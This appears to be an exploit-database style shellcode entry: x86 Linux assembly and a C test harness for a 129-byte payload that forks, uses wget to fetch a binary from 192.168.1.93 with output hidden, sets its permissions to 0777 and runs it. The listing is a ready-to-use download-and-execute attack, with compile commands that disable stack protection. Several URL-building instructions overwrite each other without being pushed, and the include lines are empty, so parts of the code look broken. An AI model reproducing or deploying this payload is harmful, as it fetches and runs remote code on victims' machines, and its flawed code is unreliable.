/** ; Shellcode 129 Bytes ; download (via wget) + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1 ; global _start section .text _start: ;fork xor eax,eax mov al,0x2 int 0x80 xor ebx,ebx cmp eax,ebx jz download ; wait(NULL) xor eax,eax mov al,0x7 int 0x80 ; give execution permissions to the binary x xor ecx,ecx xor eax, eax push eax mov al, 0xf push 0x78 mov ebx, esp xor ecx, ecx mov cx, 0x1ff int 0x80 ; execution of binary x xor eax, eax push eax push 0x78 mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 download: push 0xb pop eax cdq push edx ; download uri mov eax, 0x31263e32 ; 1&>2 hide_output[4] mov eax, 0x6c6c756e ; llun/ hide_output[3] mov eax, 0x2f766564 ; ved hide_output[2] mov eax, 0x2f3e20 ; /> hide_output[1] mov eax, 0x782f2f ; x// path[1] mov eax, 0x33392e31 ;93.1 addr[3] mov eax, 0x2e383631 ;.861 addr[2] mov eax, 0x2e323931 ;.291 addr[1] push eax mov ecx,esp push edx ; download execution in /usr/bin/wget push 0x74 ;t push 0x6567772f ;egw/ push 0x6e69622f ;nib/ push 0x7273752f ;rsu/ mov ebx,esp push edx push ecx push ebx mov ecx,esp int 0x80 **/ // nasm -felf32 wget.nasm -o wget.o // ld -m elf_i386 wget.o -o wget #include #include // gcc -z execstack -fno-stack-protector shellcode.c -o shellcode // SHELLCODE 129 Bytes char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8" "\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9" "\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31" "\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50" "\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1" "\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8" "\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8" "\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8" "\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8" "\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50" "\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65" "\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72" "\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) buf; (int)(*func)(); }